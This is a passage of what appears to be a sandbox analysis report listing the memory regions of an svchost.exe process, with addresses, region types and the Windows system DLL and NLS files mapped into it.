0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1457 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1458 start_va = 0x2900000 end_va = 0x29dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1459 start_va = 0x29e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 1460 start_va = 0x2ae0000 end_va = 0x2b6dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1461 start_va = 0x2bd0000 end_va = 0x2bd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 1462 start_va = 0x2be0000 end_va = 0x2c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002be0000" filename = "" Region: id = 1463 start_va = 0x2c60000 end_va = 0x2cdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 1464 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1465 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1466 start_va = 0x2f00000 end_va = 0x2f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1467 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1468 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 1469 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1470 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1471 start_va = 0x3400000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1472 start_va = 0x34a0000 end_va = 0x34a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 1473 start_va = 0x34b0000 end_va = 0x34b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 1474 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 1475 start_va = 0x3600000 end_va = 0x36fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 1476 start_va = 0x3800000 end_va = 0x387ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1477 start_va = 0x3900000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1478 start_va = 0x3a00000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1479 start_va = 0x3bc0000 end_va = 0x3bc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 1480 start_va = 0x3c00000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1481 start_va = 0x3e00000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 1482 start_va = 0x4000000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1483 start_va = 0x4100000 end_va = 0x41fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 1484 start_va = 0x4200000 end_va = 0x42fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1485 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1486 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1487 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1488 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1489 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1490 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1491 start_va = 0x4a00000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a00000" filename = "" Region: id = 1492 start_va = 0x4c10000 end_va = 0x4c11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004c10000" filename = "" Region: id = 1493 start_va = 0x4cb0000 end_va = 0x4cb1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1494 start_va = 0x4ce0000 end_va = 0x4ce4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1495 start_va = 0x4cf0000 end_va = 0x4cfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1496 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1497 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1498 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1499 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1500 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1501 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1502 start_va = 0x5400000 end_va = 0x547ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1503 start_va = 0x5500000 end_va = 0x557ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 1504 start_va = 0x5580000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005580000" filename = "" Region: id = 1505 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1506 start_va = 0x57b0000 end_va = 0x57c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1256.nls" filename = "\\Windows\\System32\\C_1256.NLS" (normalized: "c:\\windows\\system32\\c_1256.nls") Region: id = 1507 start_va = 0x57d0000 end_va = 0x57e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 1508 start_va = 0x5810000 end_va = 0x590ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005810000" filename = "" Region: id = 1509 start_va = 0x59a0000 end_va = 0x59a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059a0000" filename = "" Region: id = 1510 start_va = 0x59b0000 end_va = 0x5aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 1511 start_va = 0x5ab0000 end_va = 0x5baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005ab0000" filename = "" Region: id = 1512 start_va = 0x5bb0000 end_va = 0x5c2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 1513 start_va = 0x5c30000 end_va = 0x5d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005c30000" filename = "" Region: id = 1514 start_va = 0x5d30000 end_va = 0x5e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d30000" filename = "" Region: id = 1515 start_va = 0x5e30000 end_va = 0x5e40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1254.nls" filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls") Region: id = 1516 start_va = 0x5e50000 end_va = 0x5e60fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1250.nls" filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls") Region: id = 1517 start_va = 0x5e70000 end_va = 0x5e76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e70000" filename = "" Region: id = 1518 start_va = 0x5e80000 end_va = 0x5e90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1253.nls" filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls") Region: id = 1519 start_va = 0x5ea0000 end_va = 0x5eb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1257.nls" filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls") Region: id = 1520 start_va = 0x5ec0000 end_va = 0x5ed0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 1521 start_va = 0x5ee0000 end_va = 0x5ef0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1522 start_va = 0x5f00000 end_va = 0x5ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005f00000" filename = "" Region: id = 1523 start_va = 0x6000000 end_va = 0x60fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006000000" filename = "" Region: id = 1524 start_va = 0x6100000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006100000" filename = "" Region: id = 1525 start_va = 0x6200000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006200000" filename = "" Region: id = 1526 start_va = 0x6300000 end_va = 0x63fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006300000" filename = "" Region: id = 1527 start_va = 0x6400000 end_va = 0x64fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006400000" filename = "" Region: id = 1528 start_va = 0x6500000 end_va = 0x65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006500000" filename = "" Region: id = 1529 start_va = 0x6600000 end_va = 0x66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006600000" filename = "" Region: id = 1530 start_va = 0x6700000 end_va = 0x67fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006700000" filename = "" Region: id = 1531 start_va = 0x6800000 end_va = 0x68fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1532 start_va = 0x6900000 end_va = 0x69fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1533 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1534 start_va = 0x6b00000 end_va = 0x6bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 1535 start_va = 0x6c00000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006c00000" filename = "" Region: id = 1536 start_va = 0x6d00000 end_va = 0x6dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006d00000" filename = "" Region: id = 1537 start_va = 0x6e00000 end_va = 0x6efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006e00000" filename = "" Region: id = 1538 start_va = 0x6f00000 end_va = 0x6ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006f00000" filename = "" Region: id = 1539 start_va = 0x7000000 end_va = 0x70fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007000000" filename = "" Region: id = 1540 start_va = 0x7100000 end_va = 0x7127fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1541 start_va = 0x7130000 end_va = 0x7160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1542 start_va = 0x7170000 end_va = 0x7180fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1543 start_va = 0x7190000 end_va = 0x71c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1544 start_va = 0x71d0000 end_va = 0x7200fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1545 start_va = 0x74c0000 end_va = 0x75bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000074c0000" filename = "" Region: id = 1546 start_va = 0x7800000 end_va = 0x78fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007800000" filename = "" Region: id = 1547 start_va = 0x7900000 end_va = 0x79fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007900000" filename = "" Region: id = 1548 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 1549 start_va = 0x7b50000 end_va = 0x7c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007b50000" filename = "" Region: id = 1550 start_va = 0x7c50000 end_va = 0x7d4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c50000" filename = "" Region: id = 1551 start_va = 0x7d50000 end_va = 0x7e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d50000" filename = "" Region: id = 1552 start_va = 0x7f00000 end_va = 0x7ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007f00000" filename = "" Region: id = 1553 start_va = 0x8000000 end_va = 0x80fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 1554 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 1555 start_va = 0x8200000 end_va = 0x82fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008200000" filename = "" Region: id = 1556 start_va = 0x8300000 end_va = 0x83fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008300000" filename = "" Region: id = 1557 start_va = 0x8400000 end_va = 0x84fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008400000" filename = "" Region: id = 1558 start_va = 0x8700000 end_va = 0x87fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 1559 start_va = 0x8800000 end_va = 0x88fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 1560 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1561 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1562 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1563 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1564 start_va = 0x7ff6a3140000 end_va = 0x7ff6a314cfff monitored = 0 entry_point = 0x7ff6a3143980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1565 start_va = 0x7ff862e10000 end_va = 0x7ff862e27fff monitored = 0 entry_point = 0x7ff862e11b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 1566 start_va = 0x7ff863e20000 end_va = 0x7ff8640cffff monitored = 0 entry_point = 0x7ff863e21cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1567 start_va = 0x7ff864c90000 end_va = 0x7ff864cc1fff monitored = 0 entry_point = 0x7ff864c9b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 1568 start_va = 0x7ff8653c0000 end_va = 0x7ff8653fefff monitored = 0 entry_point = 0x7ff8653e82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 1569 start_va = 0x7ff865490000 end_va = 0x7ff86559efff monitored = 0 entry_point = 0x7ff8654cc010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1570 start_va = 0x7ff8655a0000 end_va = 0x7ff8655e5fff monitored = 0 entry_point = 0x7ff8655a79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 1571 start_va = 0x7ff865680000 end_va = 0x7ff865696fff monitored = 0 entry_point = 0x7ff865687520 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 1572 start_va = 0x7ff8656a0000 end_va = 0x7ff865721fff monitored = 0 entry_point = 0x7ff8656a2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 1573 start_va = 0x7ff865820000 end_va = 0x7ff86583efff monitored = 0 entry_point = 0x7ff865824960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 1574 start_va = 0x7ff865840000 end_va = 0x7ff865883fff monitored = 0 entry_point = 0x7ff8658683e0 region_type = mapped_file name = "updatehandlers.dll" filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll") Region: id = 1575 start_va = 0x7ff865890000 end_va = 0x7ff8658ecfff monitored = 0 entry_point = 0x7ff8658be510 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 1576 start_va = 0x7ff865be0000 end_va = 0x7ff865bf0fff monitored = 0 entry_point = 0x7ff865be7480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 1577 start_va = 0x7ff865c40000 end_va = 0x7ff865ca6fff monitored = 0 entry_point = 0x7ff865c4b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 1578 start_va = 0x7ff865cb0000 end_va = 0x7ff865cc0fff monitored = 0 entry_point = 0x7ff865cb28d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 1579 start_va = 0x7ff865cd0000 end_va = 0x7ff865cecfff monitored = 0 entry_point = 0x7ff865cd4f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 1580 start_va = 0x7ff865f10000 end_va = 0x7ff865f23fff monitored = 0 entry_point = 0x7ff865f12a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 1581 start_va = 0x7ff8663f0000 end_va = 0x7ff86650cfff monitored = 0 entry_point = 0x7ff86641fe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 1582 start_va = 0x7ff867260000 end_va = 0x7ff867277fff monitored = 0 entry_point = 0x7ff86726b850 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 1583 start_va = 0x7ff867cf0000 end_va = 0x7ff867d01fff monitored = 0 entry_point = 0x7ff867cf1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 1584 start_va = 0x7ff86ae00000 end_va = 0x7ff86ae51fff monitored = 0 entry_point = 0x7ff86ae03d30 region_type = mapped_file name = "cryptngc.dll" filename = "\\Windows\\System32\\cryptngc.dll" (normalized: "c:\\windows\\system32\\cryptngc.dll") Region: id = 1585 start_va = 0x7ff86ae60000 end_va = 0x7ff86b05ffff monitored = 0 entry_point = 0x7ff86aed5240 region_type = mapped_file name = "wlidsvc.dll" filename = "\\Windows\\System32\\wlidsvc.dll" (normalized: "c:\\windows\\system32\\wlidsvc.dll") Region: id = 1586 start_va = 0x7ff86c230000 end_va = 0x7ff86c247fff monitored = 0 entry_point = 0x7ff86c234290 region_type = mapped_file name = "elscore.dll" filename = "\\Windows\\System32\\ELSCore.dll" (normalized: "c:\\windows\\system32\\elscore.dll") Region: id = 1587 start_va = 0x7ff86c730000 end_va = 0x7ff86c75efff monitored = 0 entry_point = 0x7ff86c73ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1588 start_va = 0x7ff86c8b0000 end_va = 0x7ff86c8c3fff monitored = 0 entry_point = 0x7ff86c8b3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 1589 start_va = 0x7ff86c8d0000 end_va = 0x7ff86c8f7fff monitored = 0 entry_point = 0x7ff86c8defc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1590 start_va = 0x7ff86c960000 end_va = 0x7ff86c97dfff monitored = 0 entry_point = 0x7ff86c96ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 1591 start_va = 0x7ff86d180000 end_va = 0x7ff86d1fffff monitored = 0 entry_point = 0x7ff86d1ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1592 start_va = 0x7ff86d220000 end_va = 0x7ff86d23dfff monitored = 0 entry_point = 0x7ff86d223a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1593 start_va = 0x7ff86d2d0000 end_va = 0x7ff86d305fff monitored = 0 entry_point = 0x7ff86d2d27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 1594 start_va = 0x7ff86d310000 end_va = 0x7ff86d325fff monitored = 0 entry_point = 0x7ff86d311d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 1595 start_va = 0x7ff86e400000 end_va = 0x7ff86e483fff monitored = 0 entry_point = 0x7ff86e418d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 1596 start_va = 0x7ff86e590000 end_va = 0x7ff86e5a5fff monitored = 0 entry_point = 0x7ff86e5955e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1597 start_va = 0x7ff86e5b0000 end_va = 0x7ff86e685fff monitored = 0 entry_point = 0x7ff86e5da800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 1598 start_va = 0x7ff86e690000 end_va = 0x7ff86e6a5fff monitored = 0 entry_point = 0x7ff86e691af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1599 start_va = 0x7ff86e6b0000 end_va = 0x7ff86e6c9fff monitored = 0 entry_point = 0x7ff86e6b2330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1600 start_va = 0x7ff86e6d0000 end_va = 0x7ff86e6dcfff monitored = 0 entry_point = 0x7ff86e6d1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1601 start_va = 0x7ff86e8d0000 end_va = 0x7ff86e933fff monitored = 0 entry_point = 0x7ff86e8ebed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 1602 start_va = 0x7ff86e940000 end_va = 0x7ff86e964fff monitored = 0 entry_point = 0x7ff86e949900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1603 start_va = 0x7ff86e970000 end_va = 0x7ff86e983fff monitored = 0 entry_point = 0x7ff86e971800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1604 start_va = 0x7ff86e990000 end_va = 0x7ff86ea85fff monitored = 0 entry_point = 0x7ff86e9c9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1605 start_va = 0x7ff86ea90000 end_va = 0x7ff86eb03fff monitored = 0 entry_point = 0x7ff86eaa5eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 1606 start_va = 0x7ff86eb10000 end_va = 0x7ff86ec46fff monitored = 0 entry_point = 0x7ff86eb50480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 1607 start_va = 0x7ff86ef10000 end_va = 